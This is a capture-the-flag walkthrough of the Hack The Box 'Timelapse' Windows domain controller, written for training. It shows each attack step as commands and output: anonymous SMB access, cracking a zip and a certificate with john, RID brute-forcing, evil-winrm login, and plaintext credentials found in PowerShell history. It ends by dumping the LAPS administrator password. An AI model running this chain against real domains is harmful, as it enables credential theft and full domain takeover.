Timelapse - [HTB]
![Cover Image for Timelapse - [HTB]](/assets/images/blog/Timelapse-htb/Timelapse.png)
Marmeus
Table of Contents
Introduction
Timelapse is an easy Windows machine where the attacker will have to use some certificates and some rid enumeration to access the machine as the user "leggacy". Then, looking at the PowerShell history, it will find some credentials for a user who can read LAPS passwords. Finally, using crackmapexec the attacker can obtain the DC password, obtaining the root flag.
Enumeration
As always, let's start finding all opened ports in the machine with Nmap.
kali@kali:~/Documents/HTB/Timelapse$ sudo nmap -v -sS -p- -n -T4 -oN AllPorts.txt 10.10.11.52
Nmap scan report for 10.10.11.52
Host is up (0.18s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
54552/tcp open unknown
Read data files from: /usr/bin/../share/nmapThen, we continue with a deeper scan of every opened port, getting more information about each service.
kali@kali:~/Documents/HTB/Timelapse$ sudo nmap -sC -sV -n -T4 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49696,54552 10.10.11.52
Nmap scan report for 10.10.11.52
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 04:14:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-03-28T04:16:06+00:00; +7h59m59s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
54552/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-28T04:15:28
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 27 16:16:10 2022 -- 1 IP address (1 host up) scanned in 106.26 secondsThanks to Nmap, it was possible to obtain the domain of the machine dc01.timelapse.htb.
Looking at the SMB service without credentials, there is a share named Shares.
kali@kali:~/Documents/HTB/Timelapse$ smbclient -N -L //dc01.timelapse.htb/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to dc01.timelapse.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Enumerating the share, there is a winrm_backup.zip and LAPS' documentation.
kali@kali:~/Documents/HTB/Timelapse$ smbclient -N //dc01.timelapse.htb/Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1192342 blocks available
smb: \> cd Dev\
smb: \Dev\> dir
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1192342 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \Dev\> cd ..\HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021The backup file is password protected. Nonetheless, it can be cracked pretty easily with john.
kali@kali:~/Documents/HTB/Timelapse$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
kali@kali:~/Documents/HTB/Timelapse$ zip2john winrm_backup.zip > zip_hash.txt
kali@kali:~/Documents/HTB/Timelapse$ john -w=/usr/share/wordlists/rockyou.txt zip_hash.txt
[...]
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)Inside the zip file, there is a windows certificate.
kali@kali:~/Documents/HTB/Timelapse$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
inflating: legacyy_dev_auth.pfx
This certificate is also password protected. However, once again, it can be cracked with john.
kali@kali:~/Documents/HTB/Timelapse$ sudo apt install john-data -y
kali@kali:~/Documents/HTB/Timelapse$ pfx2john legacyy_dev_auth.pfx > legacy_dev_hasht.txt
kali@kali:~/Documents/HTB/Timelapse$ john -w=/usr/share/wordlists/rockyou.txt legacy_dev_hasht.txt
[...]
thuglegacy (legacyy_dev_auth.pfx) Moreover, doing some rid-brute force, it can be discovered that "legaccy" is a legit user on the AD domain.
kali@kali:~/Documents/HTB/Timelapse$ crackmapexec smb dc01.timelapse.htb -d timelapse.htb -u 'guest' -p '' --rid-brute | grep -i user
SMB dc01.timelapse.htb 445 DC01 500: TIMELAPSE\Administrator (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 501: TIMELAPSE\Guest (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 502: TIMELAPSE\krbtgt (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 513: TIMELAPSE\Domain Users (SidTypeGroup)
SMB dc01.timelapse.htb 445 DC01 525: TIMELAPSE\Protected Users (SidTypeGroup)
SMB dc01.timelapse.htb 445 DC01 1000: TIMELAPSE\DC01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1601: TIMELAPSE\thecybergeek (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1602: TIMELAPSE\payl0ad (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1603: TIMELAPSE\legacyy (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1604: TIMELAPSE\sinfulz (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1605: TIMELAPSE\babywyrm (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1606: TIMELAPSE\DB01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1607: TIMELAPSE\WEB01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1608: TIMELAPSE\DEV01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 3103: TIMELAPSE\svc_deploy (SidTypeUser)Exploitation
Because the only service that accepts ciphered communication is winrm with evil-winrm, we need to convert the windows certificate into a private key and certificate in PEM format. After that, you will obtain the user flag.
kali@kali:~/Documents/HTB/Timelapse$ openssl pkcs12 -in legacyy_dev_auth.pfx -out private.key -nocerts -nodes
Enter Import Password:
kali@kali:~/Documents/HTB/Timelapse$ openssl pkcs12 -in legacyy_dev_auth.pfx -out certificate.pem -nokeys -clcerts
kali@kali:~/Documents/HTB/Timelapse$ evil-winrm -S -c certificate.pem -k private.key -i dc01.timelapse.htb -u legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
[CENSORED]Privilege Escalation
Looking at the legacyy's PowerShell console history, we can obtain some credentials used to access the machine through winrm as the user "svc_deploy".
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitEnumerating this user, you can see that it is a member of the "LAPS_Readers" group.
*Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
[...]
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.Hence, thanks to crackmapexec, you can retrieve the LAPS passwords, obtaining the DC01's password.
Note: This password change for every machine reset.
kali@kali:~/Documents/HTB/Timelapse$ crackmapexec ldap 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' –kdcHost 10.10.11.152 -M laps
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer: DC01$ Password: 7-&#sh5C%]y@LGtq{ET8Yi{1Finally, we can obtain the root flag accessing the machine as Administration.
kali@kali:~/Documents/HTB/Timelapse$ evil-winrm -i 10.10.11.152 -S -u Administrator -p '7-&#sh5C%]y@LGtq{ET8Yi{1'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:/Users/TRX/Desktop/root.txt"
[CENSORED_FLAG]